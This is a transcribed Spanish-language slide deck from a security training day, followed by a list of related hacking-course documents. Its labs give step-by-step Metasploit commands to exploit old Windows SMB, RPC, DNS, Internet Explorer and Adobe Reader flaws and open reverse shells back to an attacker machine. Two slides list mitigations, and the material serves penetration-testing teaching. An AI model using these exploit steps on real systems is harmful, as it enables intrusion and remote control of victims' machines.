SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.

Tamaño: px
Comenzar la demostración a partir de la página:

Download "SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes."

Transcripción

1 SOLUTIONS FOR KEEPING YOUR BUSINESS UP Tel. +(507) Tel. +(1) Aptdo , Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas Operativos Windows Explotando Vulnerabilidades a Servicios / Ataques a Clientes Technologies 1

2 Security Day> Perú> Agenda Lab 1. Explotando Vulnerabilidad de SMB v2 (ms09_050_smb2) Equipo Afectado Server Windows 2008 (Role de File Server) Lab 2. Explotando Vulnerabilidad de RPC (ms08_067_netapi) Equipo afectado Windows Server 2003 (Cualquier Role) Lab 3. Explotando Vulnerabilidad de DNS (ms07_029_msdns_zonename) Equipo afectado Windows Server 2003 (Controlador de Dominio) Lab 4. Explotando Vulnerabilidad de Iexplorer (ms10_002_aurora) Lab 5. Explotando Vulnerabilidad de Acrobat Sing 2

3 Aprovechando vulnerabilidades> Ataque vía vulnerabilidad ms09_050_smb2 Esta vulnerabilidad aprovecha el manejo que utiliza el sistema operativo a los paquetes Server Message Block (SMB versión 2). Enviando paquetes maliciosos un atacante puede lograr el acceso al equipo afectado con privilegios administrativos. Afecta a la familia de sistemas Windows 2008 y Windows Vista. 3

4 Aprovechando vulnerabilidades> Lab vulnerabilidad ms09_050_smb2 Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfconsole para interactuar con el shell de metasploit../msfconsole Realizamos la búsqueda de la vulnerabilidad dentro del framework. search smb2 Lo anterior nos volcará diferentes resultados con el contenido del parámetro de búsqueda. Elegimos el exploit a utilizar asi: use windows/smb/ms09_050_smb2_negotiate_func_index 4

5 Aprovechando vulnerabilidades> Lab vulnerabilidad ms09_050_smb2 Revisamos las opciones de configuración del exploit show options Configuramos las opciones así: set RHOST ip_victima set LHOST ip_atacante set TARGET 0 Buscamos el PAYLOAD a utilizar. show payloads Elegimos el PAYLOAD. set PAYLOAD windows/meterpreter/reverse_tcp Configuramos tiempo de espera de ejecucion del exploit, lanzamos nuestro exploit. set wait 60 exploit 5

6 Aprovechando vulnerabilidades> Ataque vía vulnerabilidad MS08_67 Esta vulnerabilidad aprovecha el manejo de los paquetes RPC en los sistemas windows. Enviando un paquete malicioso se puede lograr la ejecución de programas o comando en el equipo afectado. Afecta a la familia de sistemas Windows 2000, Windows XP y Windows

7 Aprovechando vulnerabilidades> Lab vulnerabilidad MS08_67 Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfcli para hacer una busqueda del exploit../msfcli grep ms08_067 Una vez ubicado el exploit ejecutamos lo siguiente:./msfcli exploit/windows/smb/ms08_067_netapi RHOST=ip_victima PAYLOAD=windows/shell_reverse_tcp LHOST=ip_atacante E Lo anterior nos volcará un sesión de línea de comando del equipo victima 7

8 Aprovechando vulnerabilidades> Ataque vía vulnerabilidad MS07_029_MSDNS_ZONENAME Esta vulnerabilidad se basa en un ataque de Buffer Overflow hacia la interface RPC del Servicio DNS del equipo afectado. La vulnerabilidad se ejecuta enviando cadenas de caracteres largas con secuencias octales escapadas a nivel del servicio dns. Esto puede lograr la ejecución de programas o comandos en el equipo afectado con privilegios administrativos. Afecta a la familia de sistemas Windows

9 Ataques a DNS > Buffer Overflows > Lab: Explotando DNS vía exploit de buffer overflow de RPC H. Hacker con PC Linux y Metasploit 2 1 Internet Previo al ataque H. realiza un escaneo de puertos e identifica un equipo con win2k3 y el servicio DNS Nmap ss PN O vv (ip_victima) 1. Existe la posibilidad de que el servicio DNS pueda ser vulnerable cd /pentest/exploits/framework3./msfconsole (Levanta framework de explotación Metasploit) 2. Realiza la busqueda del exploit para RPC DNS de Windows y lo utiliza show exploits search msdns_zonename windows/dcerpc/ms07_029_msdns_zonename 3. Revisa las opciones del exploit y configura sus parámetros show options set RHOST ip_victima set LHOST ip_atacante set TARGET 0 (Versión y Plataforma de la Victima) SW. Servidor DNS Vulnerable 4. Busqueda, definición y Ejecución de PAYLOADS show PAYLOADS set PAYLOAD windows/shell_reverse_tcp (Reverse Shell Sesion de Linea de Comandos) set PAYLOAD windows/vncinject/reverse-tcp (Sesion Grafica de Reverso) exploit (Lanza el exploit) sessions l (L minuscula. Lista las sesiones establecidas) session i #de_sesión (Interactúa con la sesión previamente establecida) 2004 Ximark Technologies, Inc. Todos los derechos reservados. v.1.4 9

10 Hacking de Sistemas Operativos Win NT/2000/XP > Ataques sin Autenticación > Ataques al IIS > Soluciones Filtre el ingreso y egreso de paquetes en el perímetro. Mantenga los servidores de misión critica en una DMZ Política de administración de parches: Instale los últimos parches provistos por el fabricante Instale los últimos Service Packs Use NTFS Deshabilite servicios innecesarios Habilite las bitácoras de eventos Instale un IPS frente de los servidores Realice análisis de vulnerabilidades y pruebas de penetración periodicas 2004 Ximark Technologies, Inc. Todos los derechos reservados. v

11 Client Side Attacks> Ataques destinados a aprovechar debilidades (vulnerabilidades) en los navegadores de internet del usuario final. Ejm: IE6, IE7, Mozilla Firefox, Opera, etc. Se requiere un cliente (browser) y un servidor que cuelgue el exploit (metasploit) 11

12 Client Side Attacks> Vulnerabilidad MS10_002_Aurora Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfconsole Para hacer una busqueda del exploit ejecutamos. search aurora Una vez ubicado el exploit ejecutamos lo siguiente: use windows/browser/ms10_002_aurora Configuramos las variables de entorno set LHOST (ip_atacante) set SRVHOST (ip_atacante) set URIPATH / set PAYLOAD windows/meterpreter/reverse_tcp 12

13 Client Side Attacks> Vulnerabilidad MS10_002_Aurora Lanzamos el exploit exploit Copiamos el URIPATH dado por metasploit [*] Started reverse handler on :4444 [*] Using URL: Nos vamos al virtual machine con Win XP. Abrimos el Iexplorer y pegamos el URIPATH Esto nos debe volcar una sesion de meterpreter en nuestro Backtrack4. Para ver la sesiones ejecutamos: sessions l Para interactuar con una sesion colocamos: sessions i 1 13

14 Client Side Attacks> Vulnerabilidad Adobe_Cooltype_Sing Desde nuestro Backtrack vamos al directorio de Metasploit3 cd /pentest/exploits/framework3 Ejecutamos el comando./msfconsole Para hacer una busqueda del exploit ejecutamos. search adobe Una vez ubicado el exploit ejecutamos lo siguiente: use windows/fileformat/adobe_cooltype_sing Revisar las variables de entorno Show options Configurar las variables de entorno set filename nombre-archivo.pdf set payload windows/meterpreter/reverse_tcp 14

15 Client Side Attacks> Vulnerabilidad Adobe_Cooltype_Sing Configurar las variables de entorno (continuación..) set LHOST ip_atacante set LPORT puerto_a_escuchar exploit 15

16 Client Side Attacks> Soluciones Mantenga actualizado su navegador de internet Aplique los últimos parches y service packs del Sistema Operativo Sea cuidadoso al accesar links enviados por correo o chat 16

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard:

Más detalles

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita.

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita. Ethical Hacking en modo Gráfico Herramientas para hacking ético hay muchas, las profesionales o pagas ofrecen informes mucho más detallados que las no pagas, pero ambas nos dan un indicio de que es lo

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

SECURITY DAY PERU. Ataques a las Redes Inalámbricas. Vulnerando Redes Inalámbricas WEP y WPA. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Redes Inalámbricas. Vulnerando Redes Inalámbricas WEP y WPA. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Redes Inalámbricas

Más detalles

..::[Manual Basico Metasploit]::..

..::[Manual Basico Metasploit]::.. ..::[Manual Basico Metasploit]::.. Creador TheJez 1) Conceptos Basicos 2) Modalidades 3) Comienzos 4) Exploits 5) Actualizar 1. Conceptos Basicos. Para empezar a hablar del metasploit, lo definiremos como

Más detalles

Metasploit Framework

Metasploit Framework Metasploit Framework ÍNDICE 1. Introducción al exploiting 2. Metasploit Framework What is? Arquitectura Módulos Adición módulos Entorno de usuario y automatización 3. Metasploit as a User Interfaces Comandos

Más detalles

Anexo 2. Realización de los escenarios de ataque

Anexo 2. Realización de los escenarios de ataque Anexo 2 Realización de los escenarios de ataque 1. Requisitos para el ataque Para la elaboración de los ataques se trabajó con los siguientes elementos: Archivos ejecutables de Slacker y Timestomp, conextensión.exe.

Más detalles

School of Hacking. Taller 3: Herramientas básicas del hacker: Metasploit y Armitage

School of Hacking. Taller 3: Herramientas básicas del hacker: Metasploit y Armitage School of Hacking Taller 3: Herramientas básicas del hacker: Metasploit y Armitage Antonio Díaz Díaz & José José Antonio Gómez, 2015 2015 Índice Metasploit Framework (José Antonio Gómez) Terminología Msfconsole:

Más detalles

Curso de Metasploit v0.3.

Curso de Metasploit v0.3. Curso de Metasploit v0.3. Autor: Ignacio Sorribas Mollar Metasploit v0.3. Índice Índice... 2 Changelog.... 3 Introducción.... 4 Fases de un test de intrusión.... 4 Comenzando a utilizar Metasploit....

Más detalles

Episodio de Pentesting

Episodio de Pentesting Episodio de Pentesting Hello world, I m backtrack Nicolás Moral de Aguilar Seguridad en tecnologías de la información Índice 1. Planteamiento del episodio 2. Conceptos necesarios 3. Configuración del escenario

Más detalles

NOTA. HONEYPOT II Servicios con HoneyBOT. Objetivo: Usar un honeypot con varios servicios de interacción media. Herramientas necesarias:

NOTA. HONEYPOT II Servicios con HoneyBOT. Objetivo: Usar un honeypot con varios servicios de interacción media. Herramientas necesarias: HONEYPOT II Servicios con HoneyBOT Popularidad: 8 Simplicidad: 10 Impacto: 5 Nivel de Riesgo: 2 Objetivo: Usar un honeypot con varios servicios de interacción media Herramientas necesarias: HoneyBOT (http://www.atomicsoftwaresolutions.com/download.php)

Más detalles

Laboratorio 6.1: Phishing con SET y Metasploit

Laboratorio 6.1: Phishing con SET y Metasploit Laboratorio 6.1: Phishing con SET y Metasploit En el laboratorio actual usted aplicará los conocimientos adquiridos en el capítulo de Hacking para demostrar lo fácil que es ejecutar un ataque de Phishing

Más detalles

Prolite Security. HACKING WINDOWS 7.

Prolite Security. HACKING WINDOWS 7. HACKING WINDOWS 7. Que vamos hacer? Vamos a tomar el control completo de un sistema Windows 7 con antivirus y pondremos un backdoor para tener acceso cuando queramos. Que necesitamos? 2 maquinas virtuales:

Más detalles

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador

Más detalles

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)

Más detalles

Seguridad Informática: Test de intrusión

Seguridad Informática: Test de intrusión Seguridad Informática: Test de intrusión Jesús Moreno León j.morenol@gmail.com Septiembre 2010 Estas diapositias son una obra derivada del artículo Test de intrusión de Chema Alonso y de los seminarios

Más detalles

MAN IN THE MIDDLE FINAL

MAN IN THE MIDDLE FINAL 2012 MAN IN THE MIDDLE FINAL Javier García Cambronel SEGUNDO DE ASIR 28/02/2012 QUÉ ES EL PROTOCOLO ARP? MAQUINAS A UTILIZAR PRÁCTICAS PRÁCTICA1 SACANDO CONTRASEÑA MOODLE Y FACEBOOK PRÁCTICA 2 EXPLOIT

Más detalles

Hacking en 5 pasos usando Software libre

Hacking en 5 pasos usando Software libre Hacking en 5 pasos usando Ponente: JUAN DAVID BERRIO LOPEZ judabe2003@gmail.com Ingeniero en Informática. Especialista en redes Universidad san Buenaventura Posgrado en Seguridad Redes UOC, CCNSP Cyberoam/India

Más detalles

Escalar de un Dominio a otro

Escalar de un Dominio a otro Escalar de un Dominio a otro 1.- Introducción: El presente artículo describe una técnica que podría utilizar un pentester para tomar control de más de un dominio en una empresa, identificando las relaciones

Más detalles

Ataques de lado Cliente (Client-Side Attacks)

Ataques de lado Cliente (Client-Side Attacks) Ataques de lado Cliente (Client-Side Attacks) Mauricio Velazco, OSEH Consultor mvelazco@open-sec.com http://ehopen-sec.blogspot.com/ Dont learn to hack, hack to learn Por qué OpenSec? Unica empresa Peruana

Más detalles

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Julio 2005 Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas

Más detalles

- Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.

- Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia. Test de Intrusión: Test de Intrusión, también llamado a veces hacking ético es una evaluación activa de las medidas de seguridad de la información. En los entornos de red complejos actuales, la exposición

Más detalles

Nos vamos a www.microsoft.com, y nos descargamos todos los paquetes de 32 Bits de Servicios de Windows Midea 2008 para Windows.

Nos vamos a www.microsoft.com, y nos descargamos todos los paquetes de 32 Bits de Servicios de Windows Midea 2008 para Windows. Instalación del Media Server Nos vamos a www.microsoft.com, y nos descargamos todos los paquetes de 32 Bits de Servicios de Windows Midea 2008 para Windows. Una vez descargados todos los paquetes que necesitamos.

Más detalles

Seguridad y Alta Disponibilidad: Test de intrusión (III): explotación de vulnerabilidades

Seguridad y Alta Disponibilidad: Test de intrusión (III): explotación de vulnerabilidades Seguridad y Alta Disponibilidad: Test de intrusión (III): explotación de vulnerabilidades Jesús Moreno León jesus.moreno.edu@ juntadeandalucía.es Septiembre 2012 Jesús Moreno León, Septiembre de 2012 Algunos

Más detalles

Hacking Ético. Módulo II_b Fase 2: Enumeración y detección de vulnerabilidades

Hacking Ético. Módulo II_b Fase 2: Enumeración y detección de vulnerabilidades Hacking Ético Módulo II_b Fase 2: Enumeración y detección de vulnerabilidades Objetivos Comprender la enumeración de Windows Cómo conectarse mediante una sesiój nula (null session) Cómo evitar la enumeracion

Más detalles

CURSO DE EXPERTO EN GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN

CURSO DE EXPERTO EN GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN CURSO DE EXPERTO EN GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN Objetivos Generales: Al término de esta acción formativa los participantes alcanzarán los siguientes objetivos: Formar al alumno en los conocimientos

Más detalles

Seguridad Informática

Seguridad Informática Seguridad Informática Técnicas de Hacking y Seguridad Luis Yagüe EFOR Temario Comparación de Sistemas Operativos desde el punto de vista de la Seguridad Informática Firewalls, Proxys, DMZs. Virus Informáticos

Más detalles

RETO FORENSE EPISODIO III Resumen Ejecutivo

RETO FORENSE EPISODIO III Resumen Ejecutivo RETO FORENSE EPISODIO III Resumen Ejecutivo José Antonio Valero Sánchez javalero@gmail.com Zaragoza, España 2006 Motivos de la intrusión. Después de analizar la imagen del sistema cabe destacar que el

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

VICEPRESIDENCIA DE OPERACIONES DEPARTAMENTO DE SISTEMAS

VICEPRESIDENCIA DE OPERACIONES DEPARTAMENTO DE SISTEMAS VICEPRESIDENCIA DE OPERACIONES DEPARTAMENTO DE SISTEMAS CONTENIDO INVITACIÓN A COTIZAR 1. ALCANCE...3 2. CONDICIONES TECNICAS...3 2.1 ANÁLISIS DE VULNERABILIDADES A LOS SERVIDORES Y FIREWALL... 3 2.1.1

Más detalles

Escaneo de servidor FTP Búsqueda de vulnerabilidades

Escaneo de servidor FTP Búsqueda de vulnerabilidades Escaneo de servidor FTP Búsqueda de vulnerabilidades David Núñez Álvarez PSI 2011/2012 Con motivo de no revelar los datos del servidor al que se le realizó el estudio vamos a suponer que su dominio es

Más detalles

Lima, 24 Setiembre, 2011 OMARC320@GMAIL.COM

Lima, 24 Setiembre, 2011 OMARC320@GMAIL.COM Lima, 24 Setiembre, 2011 OMARC320@GMAIL.COM AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6

Más detalles

ACADEMIA CISCO - ESPOL. Ethical Hacking

ACADEMIA CISCO - ESPOL. Ethical Hacking Ethical Hacking OBJETIVOS En este curso se introduce a los estudiantes a los conceptos básicos del hacking y su aplicación a fin de encontrar vulnerabilidades en una red corporativa. Los estudiantes entenderán

Más detalles

100% Laboratorios en Vivo

100% Laboratorios en Vivo 100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de

Más detalles

EEHC. Enhacke Ethical Hacking Certification

EEHC. Enhacke Ethical Hacking Certification EEHC Enhacke Ethical Hacking Certification Curso de Certificación de Hacking Ético ENHACKE S.A.C. Año 2010 ENHACKE ETHICAL HACKING CERTIFICATION EEHC INTRODUCCION El curso EEHC provee el conocimiento necesario

Más detalles

Qué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado

Qué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado Qué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado Qué implica? Un análisis activo del sistema en busca

Más detalles

WUS (WINDOWS UPDATE SERVICE)

WUS (WINDOWS UPDATE SERVICE) 1 de 13 01/12/2007 1:24 WUS (WINDOWS UPDATE SERVICE) WUS, WUS es un sistema gratuito de microsoft para mantener con las útimas actualizaciones a todos los puestos de nuestra red. Se instala el servicio

Más detalles

SISTEMAS IDEALES SISTIDE, S.A. SISTEMA GESTION DE USUARIOS

SISTEMAS IDEALES SISTIDE, S.A. SISTEMA GESTION DE USUARIOS SISTEMAS IDEALES SISTIDE, S.A. SISTEMA GESTION DE USUARIOS PÁGINA 2 SISTEMAS IDEALES SISTIDE, S.A. SISTEMA DE GESTIÓN DE USUARIOS (SGU) Hoy en día los centros de tecnología de información tienen a su cargo

Más detalles

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas W8: wexplor VIROLOGÌA Y CRIPTOLOGÌA 4NM73 W8:INTERNET EXPLORER U5: FILE TRANSFER

Más detalles

Introducción (I) SAMBA esta formado por un conjunto de aplicaciones que utilizan:

Introducción (I) SAMBA esta formado por un conjunto de aplicaciones que utilizan: Introducción (I) SAMBA esta formado por un conjunto de aplicaciones que utilizan: El protocolo de aplicación Server Message Block. El protocolo de sesión NetBIOS. SAMBA permite: Compartir sistemas de archivos

Más detalles

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Hacking Ético Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Escaneo Después de Obtener la información inicial y de localizar el rango de la red. Averiguar qué máquinas están activas.

Más detalles

IMPLEMENTACION DE UN SERVIDOR DE ACTUALIZACIONES MASTER

IMPLEMENTACION DE UN SERVIDOR DE ACTUALIZACIONES MASTER IMPLEMENTACION DE UN SERVIDOR DE ACTUALIZACIONES MASTER 20/10/2010 Contenido OBJETIVO... 3 REQUERIMIENTOS... 3 INSTALACIÓN DEL IIS... 4 INSTALACIÓN DEL WSUS MÁSTER... 9 2 OBJETIVO El alumno realizará la

Más detalles

LAS 20 VULNERABILIDADES MÁS EXPLOTADAS EN INTERNET

LAS 20 VULNERABILIDADES MÁS EXPLOTADAS EN INTERNET LAS 20 VULNERABILIDADES MÁS EXPLOTADAS EN INTERNET Desde hace ya varios años, el Instituto SANS (System Administration Networking and Security Institute) y el FBI han venido publicando una lista con las

Más detalles

Problemas de seguridad en sistemas operativos antiguos

Problemas de seguridad en sistemas operativos antiguos Problemas de seguridad en sistemas operativos antiguos Autor: Jorge Mieres, Analista de Seguridad de ESET para Latinoamérica Fecha: Martes 27 de Enero de 2009 ESET, LLC 610 West Ash Street, Suite 1900

Más detalles

CARRERA ADMINISTRADOR-USUARIO EN REDES

CARRERA ADMINISTRADOR-USUARIO EN REDES CARRERA ADMINISTRADOR-USUARIO EN REDES MATERIAS Requisito: Nociones de Redes SERVIDOR WINDOWS SERVER 30 horas MS EXCHANGE 15 horas ISA SERVER 15 horas LINUX 30 horas 3 MESES DE LUNES A VIERNES WINDOWS

Más detalles

Habilitando ipv6 en Samba 4

Habilitando ipv6 en Samba 4 Habilitando ipv6 en Samba 4 En Sambaxp2007, he demostrado que la versión de Samba 4 ha sido parcheado en orden de habilitar ipv6. En este documento, se describe como puedes habilitar ipv6 en Samba 4. Este

Más detalles

3-ANÁLISIS DE VULNERABILIDADES

3-ANÁLISIS DE VULNERABILIDADES 3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna

Más detalles

Declaraciones Anuales de Personas Físicas DeclaraSAT ejercicio 2013

Declaraciones Anuales de Personas Físicas DeclaraSAT ejercicio 2013 Declaraciones Anuales de Personas Físicas DeclaraSAT ejercicio 2013 Características Técnicas Mínimas Versión: 1 c. p. 06300 Tel. INFOSAT: 01 800 46 36 728 documento disponible en www.sat.gob.mx 1 1. Cliente

Más detalles

Guía de implementación

Guía de implementación Guía de implementación Instalación de software Contenido Descripción general de la implementación de software Servidor CommNet Windows Clúster de Windows - Servidor virtual Agente CommNet Windows Clúster

Más detalles

Webinar Gratuito Metasploit Framework

Webinar Gratuito Metasploit Framework Webinar Gratuito Metasploit Framework Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Cómputo Forense & GNU/Linux Sitio Web: http://www.reydes.com e-mail: ReYDeS@gmail.com Jueves 3 de Octubre

Más detalles

White Paper Gestión Dinámica de Riesgos

White Paper Gestión Dinámica de Riesgos White Paper Gestión Dinámica de Riesgos Compruebe por qué un Firewall con control de aplicaciones no es suficiente para los problemas de seguridad de hoy: Cómo controlar el riesgo de la red? Cómo verificar

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Instrucciones de instalación de Utilidades Intel

Instrucciones de instalación de Utilidades Intel Instrucciones de instalación de Utilidades Intel Estas instrucciones describen la manera de instalar las Utilidades Intel a partir del CD 1 del Software Intel para administración de sistemas. Las instrucciones

Más detalles

MASTER EN HACKING ÉTICO

MASTER EN HACKING ÉTICO MASTER EN HACKING ÉTICO Máster Hacking Ético Titulación Universitaria 1. Descripción: IDO Business School (Iberoamericana de Desarrollo Organizacional), en colaboración con la Universidad Internacional

Más detalles

Configure Websense v7 con su Servicio de Directorio y agentes de identificación transparente

Configure Websense v7 con su Servicio de Directorio y agentes de identificación transparente Configure Websense v7 con su Servicio de Directorio y agentes de identificación transparente web security data security email security 2009 Websense, Inc. All rights reserved. Información sobre el Webinar

Más detalles

Hacking ético. Módulo III Hacking del sistema (2ª parte)

Hacking ético. Módulo III Hacking del sistema (2ª parte) Hacking ético Módulo III Hacking del sistema (2ª parte) Objectivo del módulo Esto es lo que veremos en este módulo: Adivinación de contraseñas remotas Craqueo de contraseñas (cont) Keyloggers Escalada

Más detalles

PAG. 1. Administración Remota

PAG. 1. Administración Remota PAG. 1 Administración Remota. PAG. 2 Tabla de Contenido Objetivo 3 Introducción 4 Herramientas de Administración Remota 5 Terminal Services 5 Remote Desktop Connection 5 Computer Management 6 Telnet 6

Más detalles

Utilizar los servicios de Index Service para buscar información de forma rápida y segura, ya sea localmente o en la red.

Utilizar los servicios de Index Service para buscar información de forma rápida y segura, ya sea localmente o en la red. Funciones de servidor La familia Windows Server 2003 ofrece varias funciones de servidor. Para configurar una función de servidor, instale dicha función mediante el Asistente para configurar su servidor;

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

Guía de Implementación

Guía de Implementación Guía de Implementación Instalación de Software Tabla de Contenido Información General sobre Implementación de Software Servidor CommNet Windows Clúster de Windows - Servidor Virtual Agente de la Red de

Más detalles

Reto Forense Episodio III - Resumen Ejecutivo José Salvador González Rivera Puebla, México / Marzo 2006

Reto Forense Episodio III - Resumen Ejecutivo José Salvador González Rivera Puebla, México / Marzo 2006 Reto Forense Episodio III - Resumen Ejecutivo José Salvador González Rivera Puebla, México / Marzo 2006 Introducción La idea de este resumen ejecutivo es mostrar los resultados de la investigación sobre

Más detalles

Internet Information Services (IIS) Novedades Instalación Configuración - Troubleshooting

Internet Information Services (IIS) Novedades Instalación Configuración - Troubleshooting Internet Information Services (IIS) Novedades Instalación Configuración - Troubleshooting El Lunes 25 de Febrero de 2013 se realizó, en la Ciudad de Buenos Aires, un encuentro de capacitación que contó

Más detalles

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L.

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L. Auditorías de Seguridad: revisión como método de prevención Vicente Aguilera Díaz Internet Security Auditors, S.L. CONTENIDO 1. Protección de la información 2. Auditorías de seguridad 3. Implantación de

Más detalles

Un laboratorio bajo lupa

Un laboratorio bajo lupa Un laboratorio bajo lupa Claudio Salazar Security Research Team (cc) pablolizardo Una estructura común Root Ayudantes Ayudantes Ayudantes Ayudantes Usuario Usuario Usuario Usuario Usuario Usuario Usuario

Más detalles

Empezando con Wmap. @luisco100

Empezando con Wmap. @luisco100 Empezando con Wmap @luisco100 El objetivo de este tutorial es dar a conocer lo pasos necesarios para utilizar la herramienta de escaneo de vulnerabilidades en sitios web Wmap. Primero que todo un reconocimiento

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,

Más detalles

Implementación y Configuración de Web Security Gateway v7.5

Implementación y Configuración de Web Security Gateway v7.5 Implementación y Configuración de Web Security Gateway v7.5 web security data security email security Presentación de Soporte Técnico 2009 Websense, Inc. All rights reserved. Presentador 2 Tópicos a presentar

Más detalles

Instalación del WebSigner 6.3

Instalación del WebSigner 6.3 Interoperabilidad de los servicios telemáticos de la Administración Pública de la CAC Página 1 de 13 Instalación del WebSigner 6.3 Informe Técnico Rev. Fecha Descripción 0 02/10/12 Versión inicial 1 21/12/12

Más detalles

www.mundokoopa.com En la portada de nuestro nuevo número Ataque de Anonymous a las fuerzas de seguridad británicas y estadounidenses.

www.mundokoopa.com En la portada de nuestro nuevo número Ataque de Anonymous a las fuerzas de seguridad británicas y estadounidenses. En la portada de nuestro nuevo número Ataque de Anonymous a las fuerzas de seguridad británicas y estadounidenses. La lucha de los navegadores Microsoft, Mozilla y Google actualizan sus navegadores para

Más detalles

MINT A NIVEL BROSERW CON BEEF

MINT A NIVEL BROSERW CON BEEF MINT A NIVEL BROSERW CON BEEF Y METASPLOIT Como usuario seguimos con las mismavulnerabilidades 17 DE ABRIL DEL 2015 SANTA CRUZ BOLIVIA WALTER CAMAMA MENACHO About Me About Me - Ingeniero de sistemas Universidad

Más detalles

Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión

